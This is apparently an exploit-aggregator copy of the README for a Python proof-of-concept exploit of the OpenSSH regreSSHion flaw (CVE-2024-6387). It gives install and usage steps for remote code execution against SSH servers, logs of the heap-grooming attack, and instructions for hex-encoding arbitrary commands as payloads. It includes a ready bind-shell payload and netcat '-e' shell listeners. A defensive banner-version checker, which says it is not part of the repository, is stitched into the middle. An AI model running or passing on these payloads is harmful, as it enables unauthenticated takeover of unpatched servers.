PoC details: 422d1408c75a4c58e88972e14c5b88c59e4635da

Source
Related vulnerability
Title: OpenSSH security vulnerability (CVE-2024-6387)
Description: OpenSSH (OpenBSD Secure Shell) is a suite of connectivity tools from the Canadian OpenBSD project for securely accessing remote computers. It is an open-source implementation of the SSH protocol that encrypts all traffic and thereby blocks eavesdropping, connection hijacking and other network-level attacks. OpenSSH contains a security vulnerability caused by a race condition in a signal handler; an attacker who exploits it can execute arbitrary code remotely without authentication and gain control of the system.
Description
Proof of concept python script for regreSSHion exploit. Version 0.1.0.
Introduction
# CVE-2024-6387
*Proof of concept python script for regreSSHion exploit. Version 0.1.0*
![regreSSHion-1024x576](https://github.com/user-attachments/assets/99cec864-b32d-409a-8fc4-1f9615686024)
# Installation
```
cd ~
git clone https://github.com/l-urk/CVE-2024-6387-L.git
cd CVE-2024-6387-L
pip3 install -r requirements.txt
python3 regreSSHion.py -h
```
# Usage
```
🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script

usage: regreSSHion.py [-h] -i IP -p PORT [-s SHELLCODE] [-d] [-z]

🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script

options:
  -h, --help                           show this help message and exit
  -i IP, --ip IP                       target SSH server IPv4 addr - 172.0.0.1 (format: -i 0.0.0.0)
  -p PORT, --port PORT                 target SSH server port nmbr - mostly 22 (format: -p 00)
  -s SHELLCODE, --shellcode SHELLCODE  shellcode payload in hex - add byte (b) (format: -s b"\x00\x00\x00")
  -d, --debug                          enable debug mode - more verbose output (format: -d)
  -z, --hack                           enable hack mode skipping SSH handshake (format: -z)

🔒

🔒 Affected OpenSSH Versions: 1.2.2p1 ~ 4.4 and 8.5p1 ~ 9.8

🔒 contact: github.com/l-urk - x.com/l_urkk
```
To use the script, run regreSSHion.py with python3 and pass the target:
- Set `--ip` to the vulnerable SSH server's IPv4 address
- Set `--port` to the vulnerable SSH server's port number
```
python3 regreSSHion.py --ip 127.0.0.1 --port 22
```
```
2024-08-03 22:42:55,944 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:42:55,945 - INFOS - Connection established
2024-08-03 22:42:55,945 - INFOS - Performing SSH handshake...
2024-08-03 22:43:05,014 - INFOS - Received KEX_INIT (5 bytes)
2024-08-03 22:43:05,015 - INFOS - SSH handshake successful.
2024-08-03 22:43:05,015 - INFOS - Preparing heap...
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 1
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 2
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 3
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 4
```
Let's say you make it all the way here in the script...
```
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 3
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 4
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 5
2024-08-03 22:46:45,858 - INFOS - Sent large string
2024-08-03 22:46:45,858 - INFOS - Heap preparation complete.
2024-08-03 22:47:05,879 - INFOS - Estimated parsing time: 0.000056 seconds
2024-08-03 22:47:05,880 - INFOS - Final packet sent successfully.
2024-08-03 22:47:05,880 - INFOS - Verifying exploit success.
2024-08-03 22:47:15,890 - WARN! - No response received for verification.
```
If the script reports exploit verification success, the payload was delivered and executed.
The script retries a few times before giving up.
I would suggest trying this on your own vulnerable SSH server until you get a feel for getting the success message.
```
2024-08-03 22:47:15,891 - ERROR - Exploitation failed.
```

# Debug mode
- With debug mode enabled you get more verbose output: the received SSH version string, packet length information, and pretty much everything else that happens and can be logged.
```
python3 regreSSHion.py --ip 127.0.0.1 --port 22 --debug
```
Example Output:
```
2024-08-03 22:44:53,962 - DEBUG - Logging is set to DEBUG level
2024-08-03 22:44:53,962 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:44:53,963 - INFOS - Connection established
2024-08-03 22:44:53,963 - INFOS - Performing SSH handshake...
2024-08-03 22:44:53,963 - DEBUG - Sent SSH version string.
2024-08-03 22:44:53,963 - DEBUG - Waiting to receive SSH version string
2024-08-03 22:45:03,256 - DEBUG - Received SSH version string: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
2024-08-03 22:45:04,373 - INFOS - Received KEX_INIT (4 bytes)
2024-08-03 22:45:04,373 - INFOS - SSH handshake successful.
2024-08-03 22:45:04,373 - INFOS - Preparing heap...
```
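The debug output above exposes the server's banner (`SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1`), and the usage text lists the affected version ranges (1.2.2p1 ~ 4.4 and 8.5p1 ~ 9.8). The following added example, which is not part of this repository, turns those two facts into a defensive inventory check: it parses OpenSSH banners collected from your own hosts and flags versions that fall in the stated ranges. The upper bound of each range is treated as exclusive (OpenSSH 9.8p1 is the release that carries the fix). The `host:port<TAB>banner` record format and all sample banners are constructed for the example.

```python
import re

# Affected ranges as stated in the README usage text: 1.2.2p1 ~ 4.4 and 8.5p1 ~ 9.8.
# Tuples are (major, minor, patch, portable-release). Upper bounds are exclusive:
# 4.4 and 9.8p1 are the fixed releases, so they must not be flagged.
AFFECTED_RANGES = [
    ((1, 2, 2, 1), (4, 4, 0, 0)),
    ((8, 5, 0, 1), (9, 8, 0, 0)),
]

# Matches "SSH-2.0-OpenSSH_8.9p1 ..." and older "SSH-1.99-OpenSSH_..." banners.
BANNER_RE = re.compile(
    r"^SSH-(?:1\.99|2\.0)-OpenSSH_(\d+)\.(\d+)(?:\.(\d+))?(?:p(\d+))?"
)


def parse_openssh_version(banner):
    """Return (major, minor, patch, portable) parsed from an OpenSSH banner,
    or None when the banner is not OpenSSH or is malformed."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None
    major, minor, patch, portable = m.groups()
    return (int(major), int(minor), int(patch or 0), int(portable or 0))


def version_in_affected_range(version):
    """True when the version tuple falls inside one of the stated ranges."""
    return any(lo <= version < hi for lo, hi in AFFECTED_RANGES)


def triage_banners(lines):
    """Classify 'host:port<TAB>banner' records (constructed format).

    Returns {target: status} with status one of 'affected-version',
    'not-affected' or 'unknown'. A banner match is a lead for patch
    verification, not proof: distributions backport fixes without
    changing the upstream version string."""
    result = {}
    for line in lines:
        line = line.strip()
        if not line:
            continue
        target, _, banner = line.partition("\t")
        version = parse_openssh_version(banner)
        if version is None:
            result[target] = "unknown"
        elif version_in_affected_range(version):
            result[target] = "affected-version"
        else:
            result[target] = "not-affected"
    return result


# Constructed sample inventory; the first banner is the one shown in the
# README's debug output.
SAMPLE_BANNERS = """\
10.0.0.5:22\tSSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
10.0.0.6:22\tSSH-2.0-OpenSSH_9.8p1
10.0.0.7:22\tSSH-2.0-OpenSSH_7.4
10.0.0.8:2222\tSSH-2.0-dropbear_2022.83
10.0.0.9:22\tSSH-2.0-OpenSSH_4.3p2 Debian-9
"""

if __name__ == "__main__":
    for target, status in triage_banners(SAMPLE_BANNERS.splitlines()).items():
        print(f"{target:16} {status}")
```

Feed the function banners you collected yourself (for example from an SSH inventory scan of your own estate); hosts reported as `affected-version` should then be checked against the distribution's changelog, because a backported fix leaves the upstream version in the banner unchanged.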

# shellcode payload creation
You can build your own payload with an ASCII-to-hex converter: as the examples below show, the "shellcode" the script expects is a text command written as `\x`-escaped hex bytes. I use this ASCII-to-hex website: https://www.rapidtables.com/convert/number/ascii-to-hex.html
- Enter the text you want as the payload.
- Select the "User defined" setting and put "\x" in the input box.
- Replace all capital X's with lowercase x's, using Notepad or another program that can do character replacement.
- Move the last \x from the end to the start of the hex string.
- Add quotes to both ends so the shell interprets it as one argument.

# shellcode payload examples
hello world
```
hello world
```
```
"\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"
```
printf hello world
```
printf hello world
```
```
"\x70\x72\x69\x6E\x74\x66\x20\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"
```
make test file
```
test > test
```
```
"\x74\x65\x73\x74\x20\x3E\x20\x74\x65\x73\x74"
```
Allow incoming connections on port 9999 & open a nc shell on port 9999
```
ufw allow 9999 && /usr/bin/nc -lvp 9999 -e /usr/bin/sh
```
```
"\x75\x66\x77\x20\x61\x6C\x6C\x6F\x77\x20\x39\x39\x39\x39\x20\x26\x26\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x6E\x63\x20\x2D\x6C\x76\x70\x20\x39\x39\x39\x39\x20\x2D\x65\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x73\x68"
```

# send_socket.py
If you want to test the execution of a shellcode payload, you can use the send_socket.py script.
Usage:
```
usage: send_socket.py [-h] [-i IP] [-p PORT] [-s SHELLCODE]

send shellcode to a target socket (ip and port)

options:
  -h, --help            show this help message and exit
  -i IP, --ip IP        target ip address (default: 127.0.0.1)
  -p PORT, --port PORT  target tcp socket port (default: 1111)
  -s SHELLCODE, --shellcode SHELLCODE
                        shellcode hex to send in format: \x00\x00\x00\...etc (default: F13)
```
**Sender:**
```
python3 send_socket.py -i 127.0.0.1 -p 1111
```
**Listener:**
-  raw text interpretation
```
nc -lvp 1111
```
-  shell execution
```
nc -lvp 1111 -e /usr/bin/bash
```
File snapshot

```
[4.0K] /data/pocs/422d1408c75a4c58e88972e14c5b88c59e4635da
├── [1.2K] LICENSE
├── [6.0K] README.md
├── [ 18K] regreSSHion.py
├── [   9] requirements.txt
└── [1.4K] send_socket.py

0 directories, 5 files
```
Cached for you by the Shenlong bot.
Notes
    1. Accessing the PoC through its source link is recommended.
    2. If the source is gone or unreachable, email f.jinxu#gmail.com (replace # with @) to request a local snapshot.
    3. Shenlong has snapshotted the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.